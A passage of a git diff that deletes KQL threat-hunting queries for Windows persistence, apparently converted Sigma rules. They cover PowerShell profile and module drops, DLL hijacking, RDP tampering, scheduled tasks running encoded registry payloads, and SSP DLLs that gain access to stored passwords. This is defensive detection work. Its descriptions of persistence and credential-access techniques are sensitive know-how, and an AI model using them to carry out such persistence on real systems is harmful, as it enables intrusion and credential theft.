-// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
-// Tags: attack.persistence
-DeviceFileEvents
-| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\") and (not((InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))
\ No newline at end of file
diff --git a/Persistence/PowerShell_Profile_Modification.kql b/Persistence/PowerShell_Profile_Modification.kql
deleted file mode 100644
index cfccee4d..00000000
--- a/Persistence/PowerShell_Profile_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013
-DeviceFileEvents
-| where FolderPath endswith "\\Microsoft.PowerShell_profile.ps1" or FolderPath endswith "\\PowerShell\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7-preview\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7\\profile.ps1" or FolderPath endswith "\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" or FolderPath endswith "\\WindowsPowerShell\\profile.ps1"
\ No newline at end of file
diff --git a/Persistence/PowerShell_Script_Dropped_Via_PowerShell.EXE.kql b/Persistence/PowerShell_Script_Dropped_Via_PowerShell.EXE.kql
deleted file mode 100644
index 0ba4babc..00000000
--- a/Persistence/PowerShell_Script_Dropped_Via_PowerShell.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/05/09
-// Level: low
-// Description: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.
-// Tags: attack.persistence
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".ps1") and (not(((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath startswith "C:\\Users\\") or FolderPath contains "__PSScriptPolicyTest_" or FolderPath startswith "C:\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/Persistence/Powerup_Write_Hijack_DLL.kql b/Persistence/Powerup_Write_Hijack_DLL.kql
deleted file mode 100644
index b2cd19b0..00000000
--- a/Persistence/Powerup_Write_Hijack_DLL.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Subhash Popuri (@pbssubhash)
-// Date: 2021/08/21
-// Level: high
-// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
-In it's default mode, it builds a self deleting .bat file which executes malicious command.
-The detection rule relies on creation of the malicious bat file (debug.bat by default).
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.001
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat"
\ No newline at end of file
diff --git a/Persistence/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Persistence/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql
deleted file mode 100644
index db3f32f1..00000000
--- a/Persistence/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2023/05/05
-// Level: high
-// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
-Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1068
-DeviceFileEvents
-| where (FolderPath contains "\\PROCEXP" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe")))
\ No newline at end of file
diff --git a/Persistence/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Persistence/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql
deleted file mode 100644
index c6201772..00000000
--- a/Persistence/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
-// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1068
-DeviceFileEvents
-| where (FolderPath contains "\\procmon" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe")))
\ No newline at end of file
diff --git a/Persistence/RDP_Sensitive_Settings_Changed.kql b/Persistence/RDP_Sensitive_Settings_Changed.kql
deleted file mode 100644
index 7dbac35c..00000000
--- a/Persistence/RDP_Sensitive_Settings_Changed.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
-// Date: 2022/08/06
-// Level: high
-// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
-
-// Tags: attack.defense_evasion, attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram")
\ No newline at end of file
diff --git a/Persistence/RDP_Sensitive_Settings_Changed_to_Zero.kql b/Persistence/RDP_Sensitive_Settings_Changed_to_Zero.kql
deleted file mode 100644
index a60a95e8..00000000
--- a/Persistence/RDP_Sensitive_Settings_Changed_to_Zero.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
-// Date: 2022/09/29
-// Level: medium
-// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
-
-// Tags: attack.defense_evasion, attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\fDenyTSConnections" or RegistryKey endswith "\\fSingleSessionPerUser" or RegistryKey endswith "\\UserAuthentication")
\ No newline at end of file
diff --git a/Persistence/Register_New_IFiltre_For_Persistence.kql b/Persistence/Register_New_IFiltre_For_Persistence.kql
deleted file mode 100644
index 0a90454d..00000000
--- a/Persistence/Register_New_IFiltre_For_Persistence.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/21
-// Level: medium
-// Description: Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index.
-You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.
-
-// Tags: attack.persistence
-DeviceRegistryEvents
-| where ((RegistryKey contains "\\SOFTWARE\\Classes\\CLSID" and RegistryKey contains "\\PersistentAddinsRegistered\\{89BCB740-6119-101A-BCB7-00DD010655AF}") or (RegistryKey contains "\\SOFTWARE\\Classes\\." and RegistryKey contains "\\PersistentHandler")) and (not(((RegistryKey contains "\\CLSID\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}" or RegistryKey contains "\\CLSID\\{4887767F-7ADC-4983-B576-88FB643D6F79}" or RegistryKey contains "\\CLSID\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}" or RegistryKey contains "\\CLSID\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}" or RegistryKey contains "\\CLSID\\{098f2470-bae0-11cd-b579-08002b30bfeb}" or RegistryKey contains "\\CLSID\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}" or RegistryKey contains "\\CLSID\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}" or RegistryKey contains "\\CLSID\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}" or RegistryKey contains "\\CLSID\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}" or RegistryKey contains "\\CLSID\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}" or RegistryKey contains "\\CLSID\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}" or RegistryKey contains "\\CLSID\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}" or RegistryKey contains "\\CLSID\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}" or RegistryKey contains "\\CLSID\\{5e941d80-bf96-11cd-b579-08002b30bfeb}" or RegistryKey contains "\\CLSID\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}" or RegistryKey contains "\\CLSID\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}" or RegistryKey contains "\\CLSID\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}" or RegistryKey contains "\\CLSID\\{9694E38A-E081-46ac-99A0-8743C909ACB6}" or RegistryKey contains "\\CLSID\\{98de59a0-d175-11cd-a7bd-00006b827d94}" or RegistryKey contains "\\CLSID\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}" or RegistryKey contains "\\CLSID\\{B4132098-7A03-423D-9463-163CB07C151F}" or RegistryKey contains "\\CLSID\\{d044309b-5da6-4633-b085-4ed02522e5a5}" or RegistryKey contains "\\CLSID\\{D169C14A-5148-4322-92C8-754FC9D018D8}" or RegistryKey contains "\\CLSID\\{DD75716E-B42E-4978-BB60-1497B92E30C4}" or RegistryKey contains "\\CLSID\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}" or RegistryKey contains "\\CLSID\\{E772CEB3-E203-4828-ADF1-765713D981B8}" or RegistryKey contains "\\CLSID\\{eec97550-47a9-11cf-b952-00aa0051fe20}" or RegistryKey contains "\\CLSID\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}") or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\"))))
\ No newline at end of file
diff --git a/Persistence/Registry_Modification_to_Hidden_File_Extension.kql b/Persistence/Registry_Modification_to_Hidden_File_Extension.kql
deleted file mode 100644
index 3332821a..00000000
--- a/Persistence/Registry_Modification_to_Hidden_File_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/22
-// Level: medium
-// Description: Hides the file extension through modification of the registry
-// Tags: attack.persistence, attack.t1137
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt")
\ No newline at end of file
diff --git a/Persistence/Registry_Persistence_via_Explorer_Run_Key.kql b/Persistence/Registry_Persistence_via_Explorer_Run_Key.kql
deleted file mode 100644
index 6bb67120..00000000
--- a/Persistence/Registry_Persistence_via_Explorer_Run_Key.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community
-// Date: 2018/07/18
-// Level: high
-// Description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryValueData contains ":\\$Recycle.bin\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Default\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run"
\ No newline at end of file
diff --git a/Persistence/Rundll32_Registered_COM_Objects.kql b/Persistence/Rundll32_Registered_COM_Objects.kql
deleted file mode 100644
index 314c9c8a..00000000
--- a/Persistence/Rundll32_Registered_COM_Objects.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/02/13
-// Level: high
-// Description: load malicious registered COM objects
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.015
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-sta " or ProcessCommandLine contains "-localserver ") and (ProcessCommandLine contains "{" and ProcessCommandLine contains "}")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Persistence/Running_Chrome_VPN_Extensions_via_the_Registry_2_VPN_Extension.kql b/Persistence/Running_Chrome_VPN_Extensions_via_the_Registry_2_VPN_Extension.kql
deleted file mode 100644
index dc47093d..00000000
--- a/Persistence/Running_Chrome_VPN_Extensions_via_the_Registry_2_VPN_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/28
-// Level: high
-// Description: Running Chrome VPN Extensions via the Registry install 2 vpn extension
-// Tags: attack.persistence, attack.t1133
-DeviceRegistryEvents
-| where (RegistryKey contains "Software\\Wow6432Node\\Google\\Chrome\\Extensions" and RegistryKey endswith "update_url") and (RegistryKey contains "fdcgdnkidjaadafnichfpabhfomcebme" or RegistryKey contains "fcfhplploccackoneaefokcmbjfbkenj" or RegistryKey contains "bihmplhobchoageeokmgbdihknkjbknd" or RegistryKey contains "gkojfkhlekighikafcpjkiklfbnlmeio" or RegistryKey contains "jajilbjjinjmgcibalaakngmkilboobh" or RegistryKey contains "gjknjjomckknofjidppipffbpoekiipm" or RegistryKey contains "nabbmpekekjknlbkgpodfndbodhijjem" or RegistryKey contains "kpiecbcckbofpmkkkdibbllpinceiihk" or RegistryKey contains "nlbejmccbhkncgokjcmghpfloaajcffj" or RegistryKey contains "omghfjlpggmjjaagoclmmobgdodcjboh" or RegistryKey contains "bibjcjfmgapbfoljiojpipaooddpkpai" or RegistryKey contains "mpcaainmfjjigeicjnlkdfajbioopjko" or RegistryKey contains "jljopmgdobloagejpohpldgkiellmfnc" or RegistryKey contains "lochiccbgeohimldjooaakjllnafhaid" or RegistryKey contains "nhnfcgpcbfclhfafjlooihdfghaeinfc" or RegistryKey contains "ookhnhpkphagefgdiemllfajmkdkcaim" or RegistryKey contains "namfblliamklmeodpcelkokjbffgmeoo" or RegistryKey contains "nbcojefnccbanplpoffopkoepjmhgdgh" or RegistryKey contains "majdfhpaihoncoakbjgbdhglocklcgno" or RegistryKey contains "lnfdmdhmfbimhhpaeocncdlhiodoblbd" or RegistryKey contains "eppiocemhmnlbhjplcgkofciiegomcon" or RegistryKey contains "cocfojppfigjeefejbpfmedgjbpchcng" or RegistryKey contains "foiopecknacmiihiocgdjgbjokkpkohc" or RegistryKey contains "hhdobjgopfphlmjbmnpglhfcgppchgje" or RegistryKey contains "jgbaghohigdbgbolncodkdlpenhcmcge" or RegistryKey contains "inligpkjkhbpifecbdjhmdpcfhnlelja" or RegistryKey contains "higioemojdadgdbhbbbkfbebbdlfjbip" or RegistryKey contains "hipncndjamdcmphkgngojegjblibadbe" or RegistryKey contains "iolonopooapdagdemdoaihahlfkncfgg" or RegistryKey contains "nhfjkakglbnnpkpldhjmpmmfefifedcj" or RegistryKey contains "jpgljfpmoofbmlieejglhonfofmahini" or RegistryKey contains "fgddmllnllkalaagkghckoinaemmogpe" or RegistryKey contains "ejkaocphofnobjdedneohbbiilggdlbi" or RegistryKey contains "keodbianoliadkoelloecbhllnpiocoi" or RegistryKey contains "hoapmlpnmpaehilehggglehfdlnoegck" or RegistryKey contains "poeojclicodamonabcabmapamjkkmnnk" or RegistryKey contains "dfkdflfgjdajbhocmfjolpjbebdkcjog" or RegistryKey contains "kcdahmgmaagjhocpipbodaokikjkampi" or RegistryKey contains "klnkiajpmpkkkgpgbogmcgfjhdoljacg" or RegistryKey contains "lneaocagcijjdpkcabeanfpdbmapcjjg" or RegistryKey contains "pgfpignfckbloagkfnamnolkeaecfgfh" or RegistryKey contains "jplnlifepflhkbkgonidnobkakhmpnmh" or RegistryKey contains "jliodmnojccaloajphkingdnpljdhdok" or RegistryKey contains "hnmpcagpplmpfojmgmnngilcnanddlhb" or RegistryKey contains "ffbkglfijbcbgblgflchnbphjdllaogb" or RegistryKey contains "kcndmbbelllkmioekdagahekgimemejo" or RegistryKey contains "jdgilggpfmjpbodmhndmhojklgfdlhob" or RegistryKey contains "bihhflimonbpcfagfadcnbbdngpopnjb" or RegistryKey contains "ppajinakbfocjfnijggfndbdmjggcmde" or RegistryKey contains "oofgbpoabipfcfjapgnbbjjaenockbdp" or RegistryKey contains "bhnhkdgoefpmekcgnccpnhjfdgicfebm" or RegistryKey contains "knmmpciebaoojcpjjoeonlcjacjopcpf" or RegistryKey contains "dhadilbmmjiooceioladdphemaliiobo" or RegistryKey contains "jedieiamjmoflcknjdjhpieklepfglin" or RegistryKey contains "mhngpdlhojliikfknhfaglpnddniijfh" or RegistryKey contains "omdakjcmkglenbhjadbccaookpfjihpa" or RegistryKey contains "npgimkapccfidfkfoklhpkgmhgfejhbj" or RegistryKey contains "akeehkgglkmpapdnanoochpfmeghfdln" or RegistryKey contains "gbmdmipapolaohpinhblmcnpmmlgfgje" or RegistryKey contains "aigmfoeogfnljhnofglledbhhfegannp" or RegistryKey contains "cgojmfochfikphincbhokimmmjenhhgk" or RegistryKey contains "ficajfeojakddincjafebjmfiefcmanc" or RegistryKey contains "ifnaibldjfdmaipaddffmgcmekjhiloa" or RegistryKey contains "jbnmpdkcfkochpanomnkhnafobppmccn" or RegistryKey contains "apcfdffemoinopelidncddjbhkiblecc" or RegistryKey contains "mjolnodfokkkaichkcjipfgblbfgojpa" or RegistryKey contains "oifjbnnafapeiknapihcmpeodaeblbkn" or RegistryKey contains "plpmggfglncceinmilojdkiijhmajkjh" or RegistryKey contains "mjnbclmflcpookeapghfhapeffmpodij" or RegistryKey contains "bblcccknbdbplgmdjnnikffefhdlobhp" or RegistryKey contains "aojlhgbkmkahabcmcpifbolnoichfeep" or RegistryKey contains "lcmammnjlbmlbcaniggmlejfjpjagiia" or RegistryKey contains "knajdeaocbpmfghhmijicidfcmdgbdpm" or RegistryKey contains "bdlcnpceagnkjnjlbbbcepohejbheilk" or RegistryKey contains "edknjdjielmpdlnllkdmaghlbpnmjmgb" or RegistryKey contains "eidnihaadmmancegllknfbliaijfmkgo" or RegistryKey contains "ckiahbcmlmkpfiijecbpflfahoimklke" or RegistryKey contains "macdlemfnignjhclfcfichcdhiomgjjb" or RegistryKey contains "chioafkonnhbpajpengbalkececleldf" or RegistryKey contains "amnoibeflfphhplmckdbiajkjaoomgnj" or RegistryKey contains "llbhddikeonkpbhpncnhialfbpnilcnc" or RegistryKey contains "pcienlhnoficegnepejpfiklggkioccm" or RegistryKey contains "iocnglnmfkgfedpcemdflhkchokkfeii" or RegistryKey contains "igahhbkcppaollcjeaaoapkijbnphfhb" or RegistryKey contains "njpmifchgidinihmijhcfpbdmglecdlb" or RegistryKey contains "ggackgngljinccllcmbgnpgpllcjepgc" or RegistryKey contains "kchocjcihdgkoplngjemhpplmmloanja" or RegistryKey contains "bnijmipndnicefcdbhgcjoognndbgkep" or RegistryKey contains "lklekjodgannjcccdlbicoamibgbdnmi" or RegistryKey contains "dbdbnchagbkhknegmhgikkleoogjcfge" or RegistryKey contains "egblhcjfjmbjajhjhpmnlekffgaemgfh" or RegistryKey contains "ehbhfpfdkmhcpaehaooegfdflljcnfec" or RegistryKey contains "bkkgdjpomdnfemhhkalfkogckjdkcjkg" or RegistryKey contains "almalgbpmcfpdaopimbdchdliminoign" or RegistryKey contains "akkbkhnikoeojlhiiomohpdnkhbkhieh" or RegistryKey contains "gbfgfbopcfokdpkdigfmoeaajfmpkbnh" or RegistryKey contains "bniikohfmajhdcffljgfeiklcbgffppl" or RegistryKey contains "lejgfmmlngaigdmmikblappdafcmkndb" or RegistryKey contains "ffhhkmlgedgcliajaedapkdfigdobcif" or RegistryKey contains "gcknhkkoolaabfmlnjonogaaifnjlfnp" or RegistryKey contains "pooljnboifbodgifngpppfklhifechoe" or RegistryKey contains "fjoaledfpmneenckfbpdfhkmimnjocfa" or RegistryKey contains "aakchaleigkohafkfjfjbblobjifikek" or RegistryKey contains "dpplabbmogkhghncfbfdeeokoefdjegm" or RegistryKey contains "padekgcemlokbadohgkifijomclgjgif" or RegistryKey contains "bfidboloedlamgdmenmlbipfnccokknp")
\ No newline at end of file
diff --git a/Persistence/Scheduled_TaskCache_Change_by_Uncommon_Program.kql b/Persistence/Scheduled_TaskCache_Change_by_Uncommon_Program.kql
deleted file mode 100644
index 5d08fc53..00000000
--- a/Persistence/Scheduled_TaskCache_Change_by_Uncommon_Program.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Syed Hasan (@syedhasan009)
-// Date: 2021/06/18
-// Level: high
-// Description: Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
-// Tags: attack.persistence, attack.t1053, attack.t1053.005
-DeviceRegistryEvents
-| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache" and (not(((RegistryKey contains "Microsoft\\Windows\\UpdateOrchestrator" or RegistryKey contains "Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask\\Index" or RegistryKey contains "Microsoft\\Windows\\Flighting\\OneSettings\\RefreshCache\\Index") or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Dropbox\\Update\\DropboxUpdate.exe", "C:\\Program Files\\Dropbox\\Update\\DropboxUpdate.exe")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\PLA\\Server Manager Performance Monitor") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe" or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework" and (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\Integration\\Integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\Integration\\Integrator.exe")) or InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe" or InitiatingProcessFolderPath =~ "System" or (InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\"))))
\ No newline at end of file
diff --git a/Persistence/Scheduled_Task_Creation_Via_Schtasks.EXE.kql b/Persistence/Scheduled_Task_Creation_Via_Schtasks.EXE.kql
deleted file mode 100644
index 0ea2e752..00000000
--- a/Persistence/Scheduled_Task_Creation_Via_Schtasks.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/01/16
-// Level: low
-// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/Persistence/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql b/Persistence/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql
deleted file mode 100644
index 3d746a96..00000000
--- a/Persistence/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/02/12
-// Level: high
-// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand") and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/Persistence/Scheduled_Task_Executing_Payload_from_Registry.kql b/Persistence/Scheduled_Task_Executing_Payload_from_Registry.kql
deleted file mode 100644
index 0e49c7fb..00000000
--- a/Persistence/Scheduled_Task_Executing_Payload_from_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/18
-// Level: medium
-// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand")))
\ No newline at end of file
diff --git a/Persistence/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql b/Persistence/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql
deleted file mode 100644
index c68909e4..00000000
--- a/Persistence/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/28
-// Level: high
-// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
-// Tags: attack.execution, attack.persistence, attack.t1053.005
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " /change " or ProcessCommandLine contains " /create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "/ru " and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ")) and (not(((ProcessCommandLine contains "/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR " or ProcessCommandLine contains ":\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe" or ProcessCommandLine contains "/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST") or ((ProcessCommandLine contains "/TN TVInstallRestore" and ProcessCommandLine contains "\\TeamViewer_.exe") and FolderPath endswith "\\schtasks.exe"))))
\ No newline at end of file
diff --git a/Persistence/Security_Support_Provider_(SSP)_Added_to_LSA_Configuration.kql b/Persistence/Security_Support_Provider_(SSP)_Added_to_LSA_Configuration.kql
deleted file mode 100644
index 7d8944ed..00000000
--- a/Persistence/Security_Support_Provider_(SSP)_Added_to_LSA_Configuration.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: iwillkeepwatch
-// Date: 2019/01/18
-// Level: high
-// Description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
-
-// Tags: attack.persistence, attack.t1547.005
